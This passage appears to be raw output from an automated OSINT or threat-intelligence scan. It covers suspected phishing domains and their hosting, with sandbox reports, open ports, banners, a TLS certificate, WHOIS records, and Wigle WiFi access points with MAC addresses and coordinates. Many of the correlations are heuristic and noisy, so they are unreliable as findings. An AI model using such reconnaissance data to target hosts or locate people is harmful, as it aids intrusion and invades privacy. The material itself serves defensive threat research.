u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rhombussystems.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rhombussystems.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"75.2.60.5:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_81c_IESQMMUTEX_0_331"\n "IsoScope_81c_IE_EarlyTabStart_0x9a4_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_81c_IESQMMUTEX_0_303"\n "UpdatingNewTabPageData"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2076"\n "IsoScope_81c_IESQMMUTEX_0_519"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_81c_ConnHashTable<2076>_HashTable_Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_81c_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2076"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar2C3.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar2D3.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab2C2.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "Cab40.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "2NV4DI3M.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2NV4DI3M.txt]- [targetUID: 00000000-00002076]\n Dropped file: "7Q4BSDMY.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7Q4BSDMY.txt]- [targetUID: 00000000-00003788]\n Dropped file: "AEL973TY.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\AEL973TY.txt]- [targetUID: 00000000-00002076]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "urlref_httpsrhombussystems.com" has type "HTML document UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "Tar2C3.tmp" has type "data"- Location: [%TEMP%\\Tar2C3.tmp]- [targetUID: 00000000-00003788]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003788]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "NewErrorPageTemplate_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "RecoveryStore._59B6A8D7-6B48-11ED-BEA3-080027C7C560_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "2NV4DI3M.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\2NV4DI3M.txt]- [targetUID: 00000000-00002076]\n "Cab2C2.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab2C2.tmp]- [targetUID: 00000000-00003788]\n "_59B6A8D9-6B48-11ED-BEA3-080027C7C560_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF5F9C3305164EE004.TMP" has type "data"- Location: [%TEMP%\\~DF5F9C3305164EE004.TMP]- [targetUID: 00000000-00002076]\n "7Q4BSDMY.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\7Q4BSDMY.txt]- [targetUID: 00000000-00003788]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "Tar2D3.tmp" has type "data"- Location: [%TEMP%\\Tar2D3.tmp]- [targetUID: 00000000-00003788]\n "Cab40.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab40.tmp]- [targetUID: 00000000-00003788]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002076]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62919 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003788]\n "~DFED514D7C2021B614.TMP" has type "data"- Location: [%TEMP%\\~DFED514D7C2021B614.TMP]- [targetUID: 00000000-00002076]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rhombussystems.com\nDNT: 1\nConnection: Keep-Alive"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"rhombussystems.com" seems to be random'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://rhombussystems.com/"\n Pattern match: "https://rhombussystems.com"\n Heuristic match: "rhombussystems.com"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/92 Antivirus vendors marked sample as malicious (0% detection rate)'}], u'threat_level': 0, u'size': None, u'job_id': u'637e51ca3b1a3748295963c8', u'target_url': None, u'interest | 104.196.30.220 |
| 2023-05-12 03:12:58 | Malicious Affiliate | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [battleb0t.github.io]
https://www.openphish.com/feed.txt | battleb0t.github.io |
| 2023-05-12 02:54:15 | HTTP Status Code | No | Web Spider | 0 | 0 | 2 | 0 | None | 200 | nwapi2.battleb0t.xyz |
| 2023-05-12 03:11:18 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 2 | 0 | None | 52.3759, 4.8975 | 188.114.97.1 |
| 2023-05-12 02:53:32 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 404 Not Found
Connection: keep-alive
Content-Length: 5142
Server: GitHub.com
Content-Type: text/html; charset=utf-8
ETag: W/"64556a8c-239b"
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'
Content-Encoding: gzip
X-GitHub-Request-Id: E9B4:1F0F:9CADE8:E25A67:645D08C5
Accept-Ranges: bytes
Date: <REDACTED>
Via: 1.1 varnish
Age: 0
X-Served-By: cache-chi-klot8100040-CHI
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1683818693.056035,VS0,VE27
Vary: Accept-Encoding
X-Fastly-Request-ID: 695e2aec93a90cc9e1a6417b158a1f1d94a5129d
| 185.199.111.153 |
| 2023-05-12 03:01:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.52): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:23:40 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.15:8080 | 188.114.96.0/24 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SitecomAABCE4 (Net ID: 00:0C:F6:AA:BC:E4) | 50.8897, 6.0563 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | medyczka.pl (Category: health)
http://medyczka.pl/user/login | login |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | WestEd (Net ID: 00:02:2D:05:7E:93) | 37.780462,-122.390564 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | AIRTIES (Net ID: 00:12:BF:53:F6:5F) | 40.2024, 29.0398 |
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 1 | 3 | 0 | None | nginx | {"content-encoding": "gzip", "transfer-encoding": "chunked", "vary": "Accept-Encoding", "server": "nginx", "connection": "keep-alive", "etag": "W/\"64217dc5-156\"", "date": "Fri, 12 May 2023 02:54:22 GMT", "content-type": "text/html"} |
| 2023-05-12 02:44:39 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:29:bb:71:26:4f:a3:73:c9:d3:c4:af:c8:b3:a3:33:dc:41
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=Let's Encrypt, CN=E1
Validity
Not Before: Jan 23 21:31:46 2023 GMT
Not After : Apr 23 21:31:45 2023 GMT
Subject: CN=*.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:d7:c6:91:a2:7d:90:36:47:61:e7:f4:42:67:85:
67:bc:f6:01:51:cb:59:02:c5:69:c6:fb:5b:1b:b9:
c9:4a:2c:0e:df:23:05:55:0f:d4:97:b3:0f:c2:a8:
12:d7:19:fa:98:f0:06:8c:43:18:24:de:aa:3e:e6:
c7:25:79:67:99
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
37:BE:E1:FB:AE:23:1C:29:A5:8A:8C:D8:43:D1:35:F5:04:D1:88:E3
X509v3 Authority Key Identifier:
keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC
Authority Information Access:
OCSP - URI:http://e1.o.lencr.org
CA Issuers - URI:http://e1.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Jan 23 22:31:46.387 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:E4:5D:77:E7:B9:FC:9E:AD:1C:B5:62:
14:DD:D8:A1:B9:93:A7:95:80:D0:27:BE:9B:FC:96:DD:
90:D7:C4:30:AA:02:20:05:D4:DE:FE:C2:15:EF:1B:42:
74:2D:E4:3F:4F:CB:73:3D:EC:7B:44:18:37:71:14:A8:
00:F1:6C:6D:6B:77:67
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Jan 23 22:31:46.397 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:BD:22:C5:30:9F:6F:36:15:B7:D1:CA:
AD:CF:EB:D0:94:75:7F:1F:5A:28:FD:93:B5:75:02:8F:
D1:C6:87:41:2E:02:20:7C:52:E6:58:A4:8D:55:6A:69:
9C:2C:54:4C:7F:AC:22:28:8D:2B:54:D7:47:45:0A:C9:
6B:D8:24:59:2E:89:1F
Signature Algorithm: ecdsa-with-SHA384
30:66:02:31:00:90:aa:85:4e:91:c5:53:b9:d9:ce:56:8c:48:
a4:84:84:df:15:f2:f7:bf:4b:d6:de:72:8d:e4:36:65:23:71:
d4:4d:c8:2a:c7:b7:82:2b:69:73:9f:f4:f6:c1:7d:a3:6f:02:
31:00:97:48:3c:2f:eb:bf:19:54:bc:8e:14:95:49:a7:05:bf:
e6:fa:13:41:2f:ff:2a:2b:4a:df:86:c2:17:9a:7a:15:fb:b9:
93:c8:cf:89:19:ce:5b:35:b7:4b:d3:57:36:16
|
| 2023-05-12 02:47:32 | Open TCP Port | No | Pulsedive | 0 | 0 | 2 | 0 | None | 172.67.135.9:8080 | 172.67.135.9 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | USR9110 (Net ID: 00:14:C1:13:AB:45) | 40.2024, 29.0398 |
| 2023-05-12 02:44:30 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Netlify | pics.battleb0t.xyz |
| 2023-05-12 03:00:49 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.70): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:52:24 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://sidharth-97.github.io/netflix/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3416"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_d58_IE_EarlyTabStart_0xdec_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_d58_ConnHashTable<3416>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_d58_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_d58_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_d58_IESQMMUTEX_0_331"\n "IsoScope_d58_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.108.153:443"\n "151.101.1.229:443"\n "104.18.22.52:443"\n "172.64.100.10:443"\n "45.57.91.1:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"assets.nflxext.com"\n "cdn.jsdelivr.net"\n "ka-f.fontawesome.com"\n "kit.fontawesome.com"\n "query.prod.cms.msn.com"\n "sidharth-97.github.io"\n "teredo.ipv6.microsoft.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'file/memory contains long string with (Indicator: "dir "; File: "urlref_httpssidharth-97.github.ionetflix")\n Found string "* Copyright 2011-2021 Twitter, Inc." (Indicator: "dir "; File: "bootstrap.min_1_.css")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-56', u'name': u'Drops files with image extension', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"AAAABYjXrxZKtrzxQRVQNn2aIByoomnlbXmJ-uBy7du8a5Si3xqIsgerTlwJZG1vMpqer2kvcILy0UJQnjfRUQ5cEr7gQlYqXfxUg7bz_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "device-pile-in_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced" and extension "png"\n "mobile-0819_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3" and extension "jpg"\n "nficon2016_1_.png" has type "PNG image data 64 x 64 8-bit/color RGBA non-interlaced" and extension "png"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\program files\\internet explorer\\iexplore.exe"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df63f51a68a5499078.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfd491743fdd515733.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{1585a879-ebb4-11ed-8e6c-080027e195af}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{1585a87b-ebb4-11ed-8e6c-080027e195af}.dat"\n "iexplore.exe" reads file "c:\\users\\desktop.ini"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\favorites\\desktop.ini"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\desktop\\desktop.ini"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~dfd491743fdd515733.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{1585a87b-ebb4-11ed-8e6c-080027e195af}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df63f51a68a5499078.tmp"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{1585a879-ebb4-11ed-8e6c-080027e195af}.dat"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"logo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "svgexport-2_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "free-fa-solid-900_1_.ttf" has type "TrueType Font data 10 tables 1st "OS/2" 22 names Macintosh"- [targetUID: N/A]\n "AAAABYjXrxZKtrzxQRVQNn2aIByoomnlbXmJ-uBy7du8a5Si3xqIsgerTlwJZG1vMpqer2kvcILy0UJQnjfRUQ5cEr7gQlYqXfxUg7bz_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "IN-en-20230417-popsignuptwoweeks-perspective_alpha_website_large_1_.webp" has type "RIFF (little-endian) data Web/P image"- [targetUID: N/A]\n "bootstrap.min_1_.css" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "device-pile-in_1_.png" has type "PNG image data 640 x 480 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "free.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "bootstrap.bundle.min_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "free-fa-regular-400_1_.ttf" has type "TrueType Font data 10 tables 1st "OS/2" 22 names Macintosh"- [targetUID: N/A]\n "mobile-0819_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 640x480 components 3"- [targetUID: N/A]\n "free-v4-shims.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003416]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF0A9ADF1D503EF6B0.TMP" has type "data"- Location: [%TEMP%\\~DF0A9ADF1D503EF6B0.TMP]- [targetUID: 00000000-00003416]\n "~DF8C58A1EF4593F24A.TMP" has type "data"- Location: [%TEMP%\\~DF8C58A1EF4593F24A.TMP]- [targetUID: 00000000-00003416]\n "~DFD491743FDD515733.TMP" has type "data"- Location: [%TEMP%\\~DFD491743FDD515733.TMP]- [targetUID: 00000000-00003416]\n "~DF63F51A68A5499078.TMP" has type "data"- Location: [%TEMP%\\~DF63F51A68A5499078.TMP]- [targetUID: 00000000-00003416]\n "urlref_httpssidharth-97.github.ionetflix" has type "HTML document UTF-8 Unicode text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00003416]\n "RecoveryStore._1585A879-EBB4-11ED-8E6C-080027E195AF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_1D1B495B-EBB4-11ED-8E6C-080027E195AF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_1585A87B-EBB4-11ED-8E6C-080027E195AF_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "favicon_3_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "style_1_.css" has type "ASCII text with CRLF line terminators"- [targetUID: N/A]\n "tv_1_.webp" has type " | 185.199.108.153 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | KP51 (Net ID: 00:01:71:0A:07:87) | 52.3759, 4.8975 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 200WMadison (Net ID: 00:01:21:30:9B:23) | 41.8781, -87.6298 |
| 2023-05-12 02:54:30 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | OpenBSD OpenSSH 7.9 | 64.226.81.43 |
| 2023-05-12 03:31:32 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | abuse@resellercamp.com | Domain Name: AYSHU.XYZ
Registry Domain ID: D346635612-CNIC
Registrar WHOIS Server: whois.resellercamp.com
Registrar URL: https://idwebhost.com
Updated Date: 2023-02-06T12:49:42.0Z
Creation Date: 2023-02-01T09:45:59.0Z
Registry Expiry Date: 2024-02-01T23:59:59.0Z
Registrar: CV Jogjacamp
Registrar IANA ID: 1478
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization: cP Hosting World
Registrant State/Province: Bagerhat
Registrant Country: BD
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
